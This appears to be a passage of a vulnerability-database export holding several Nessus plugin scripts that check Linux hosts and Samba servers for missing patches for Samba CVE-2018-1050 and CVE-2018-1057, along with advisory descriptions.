value:\"2018/07/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-devel-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-client-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-common-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-debuginfo-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-doc-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-domainjoin-gui-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"samba-glusterfs-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-swat-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-clients-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-devel-3.6.23-51.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-krb5-locator-3.6.23-51.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:31:04", "bulletinFamily": "scanner", "description": "Security fix for CVE-2018-1050 CVE-2018-1057\n\n----\n\nUpdate to Samba 4.6.13\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2018-7D0ACD608B.NASL", "href": "https://www.tenable.com/plugins/nessus/108501", "published": "2018-03-21T00:00:00", "title": "Fedora 26 : 2:samba (2018-7d0acd608b)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-7d0acd608b.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108501);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/23 11:21:07\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_xref(name:\"FEDORA\", value:\"2018-7d0acd608b\");\n\n script_name(english:\"Fedora 26 : 2:samba (2018-7d0acd608b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2018-1050 CVE-2018-1057\n\n----\n\nUpdate to Samba 4.6.13\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-7d0acd608b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"samba-4.6.14-0.fc26\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-09T11:33:52", "bulletinFamily": "scanner", "description": "The version of Samba running on the remote host is 4.5.x prior to\n4.5.16, or 4.6.x prior to 4.6.14, or 4.7.x prior to 4.7.6. It is,\ntherefore, affected by a remote DoS and a remote password manipulation\nvulnerability.\n\nNote: Refer to the advisories for possible workarounds.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application", "modified": "2019-11-02T00:00:00", "id": "SAMBA_4_7_6.NASL", "href": "https://www.tenable.com/plugins/nessus/108378", "published": "2018-03-15T00:00:00", "title": "Samba 4.5.x < 4.5.16 / 4.6.x < 4.6.14 / 4.7.x < 4.7.6 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108378);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_bugtraq_id(103382, 103387);\n\n script_name(english:\"Samba 4.5.x < 4.5.16 / 4.6.x < 4.6.14 / 4.7.x < 4.7.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Samba.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Samba running on the remote host is 4.5.x prior to\n4.5.16, or 4.6.x prior to 4.6.14, or 4.7.x prior to 4.7.6. It is,\ntherefore, affected by a remote DoS and a remote password manipulation\nvulnerability.\n\nNote: Refer to the advisories for possible workarounds.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2018-1050.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2018-1057.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.5.16.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.6.14.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.7.6.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Samba version 4.5.16 / 4.6.14 / 4.7.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1057\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/15\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\n\nif (\"Samba \" >!< lanman) audit(AUDIT_NOT_LISTEN, \"Samba\", port);\n\nversion = lanman - 'Samba ';\n\nif (version =~ \"^4(\\.[5-9])?$\")\n audit(AUDIT_VER_NOT_GRANULAR, \"Samba\", port, version);\n\nfix = NULL;\n\nregexes = make_array(-2, \"a(\\d+)\", -1, \"rc(\\d+)\");\n\n# Affected :\n# Note versions prior to 4.6 are EoL\n# https://wiki.samba.org/index.php/Samba_Release_Planning\n#\n# We are including a 4.5.x check because they did release 4.5.16\n# 4.5.x < 4.5.16\n# 4.6.x < 4.6.14\n# 4.7.x < 4.7.6\nif (version =~ \"^4\\.5\\.\")\n fix = '4.5.16';\nelse if (version =~ \"^4\\.6\\.\")\n fix = '4.6.14';\nelse if (version =~ \"^4\\.7\\.\")\n fix = '4.7.6';\n\nif ( !isnull(fix) &&\n (ver_compare(ver:version, fix:fix, regexes:regexes) < 0) &&\n (ver_compare(ver:version, fix:'4.0.0', regexes:regexes) >= 0) )\n{\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Samba\", port, version);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:32:03", "bulletinFamily": "scanner", "description": "Security fix for CVE-2018-1050 CVE-2018-1057\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2018-C5C651AC44.NASL", "href": "https://www.tenable.com/plugins/nessus/108349", "published": "2018-03-15T00:00:00", "title": "Fedora 27 : 2:samba / libldb (2018-c5c651ac44)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-c5c651ac44.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108349);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/23 11:21:08\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_xref(name:\"FEDORA\", value:\"2018-c5c651ac44\");\n\n script_name(english:\"Fedora 27 : 2:samba / libldb (2018-c5c651ac44)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2018-1050 CVE-2018-1057\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-c5c651ac44\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 2:samba and / or libldb packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libldb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"samba-4.7.6-0.fc27\", epoch:\"2\")) flag++;\nif (rpm_check(release:\"FC27\", reference:\"libldb-1.3.2-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba / libldb\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:32:48", "bulletinFamily": "scanner", "description": "Bjorn Baumbach discovered that Samba incorrectly validated\npermissions when changing account passwords via LDAP. An authenticated\nattacker could use this issue to change the password of other users,\nincluding administrators, and perform actions as those users.\n(CVE-2018-1057)\n\nIt was discovered that Samba incorrectly validated inputs to the RPC\nspoolss service. An authenticated attacker could use this issue to\ncause the service to crash, resulting in a denial of service.\n(CVE-2018-1050).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3595-1.NASL", "href": "https://www.tenable.com/plugins/nessus/108335", "published": "2018-03-14T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.10 : samba vulnerabilities (USN-3595-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3595-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108335);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_xref(name:\"USN\", value:\"3595-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.10 : samba vulnerabilities (USN-3595-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjorn Baumbach discovered that Samba incorrectly validated\npermissions when changing account passwords via LDAP. An authenticated\nattacker could use this issue to change the password of other users,\nincluding administrators, and perform actions as those users.\n(CVE-2018-1057)\n\nIt was discovered that Samba incorrectly validated inputs to the RPC\nspoolss service. An authenticated attacker could use this issue to\ncause the service to crash, resulting in a denial of service.\n(CVE-2018-1050).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3595-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba and / or samba-dsdb-modules packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"samba\", pkgver:\"2:4.3.11+dfsg-0ubuntu0.14.04.14\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"samba-dsdb-modules\", pkgver:\"2:4.3.11+dfsg-0ubuntu0.14.04.14\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"samba\", pkgver:\"2:4.3.11+dfsg-0ubuntu0.16.04.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"samba-dsdb-modules\", pkgver:\"2:4.3.11+dfsg-0ubuntu0.16.04.13\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"samba\", pkgver:\"2:4.6.7+dfsg-1ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"samba-dsdb-modules\", pkgver:\"2:4.6.7+dfsg-1ubuntu3.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba / samba-dsdb-modules\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:22:25", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in Samba, a SMB/CIFS\nfile, print, and login server for Unix. The Common Vulnerabilities and\nExposures project identifies the following issues :\n\n - CVE-2018-1050\n It was discovered that Samba is prone to a denial of\n service attack when the RPC spoolss service is\n configured to be run as an external daemon.\n\n https://www.samba.org/samba/security/CVE-2018-1050.html\n\n - CVE-2018-1057\n Bjoern Baumbach from Sernet discovered that on Samba 4\n AD DC the LDAP server incorrectly validates permissions\n to modify passwords over LDAP allowing authenticated\n users to change any other users passwords, including\n administrative users.\n\n https://www.samba.org/samba/security/CVE-2018-1057.html\n\n https://wiki.samba.org/index.php/CVE-2018-1057", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-4135.NASL", "href": "https://www.tenable.com/plugins/nessus/108304", "published": "2018-03-14T00:00:00", "title": "Debian DSA-4135-1 : samba - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4135. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108304);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/13 12:30:46\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_xref(name:\"DSA\", value:\"4135\");\n\n script_name(english:\"Debian DSA-4135-1 : samba - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Samba, a SMB/CIFS\nfile, print, and login server for Unix. The Common Vulnerabilities and\nExposures project identifies the following issues :\n\n - CVE-2018-1050\n It was discovered that Samba is prone to a denial of\n service attack when the RPC spoolss service is\n configured to be run as an external daemon.\n\n https://www.samba.org/samba/security/CVE-2018-1050.html\n\n - CVE-2018-1057\n Bjoern Baumbach from Sernet discovered that on Samba 4\n AD DC the LDAP server incorrectly validates permissions\n to modify passwords over LDAP allowing authenticated\n users to change any other users passwords, including\n administrative users.\n\n https://www.samba.org/samba/security/CVE-2018-1057.html\n\n https://wiki.samba.org/index.php/CVE-2018-1057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-1050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2018-1050.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-1057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2018-1057.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://wiki.samba.org/index.php/CVE-2018-1057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/samba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/samba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4135\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the samba packages.\n\nFor the oldstable distribution (jessie), CVE-2018-1050 will be\naddressed in a later update. Unfortunately the changes required to fix\nCVE-2018-1057 for Debian oldstable are too invasive to be backported.\nUsers using Samba as an AD-compatible domain controller are encouraged\nto apply the workaround described in the Samba wiki and upgrade to\nDebian stretch.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 2:4.5.12+dfsg-2+deb9u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"ctdb\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libnss-winbind\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif 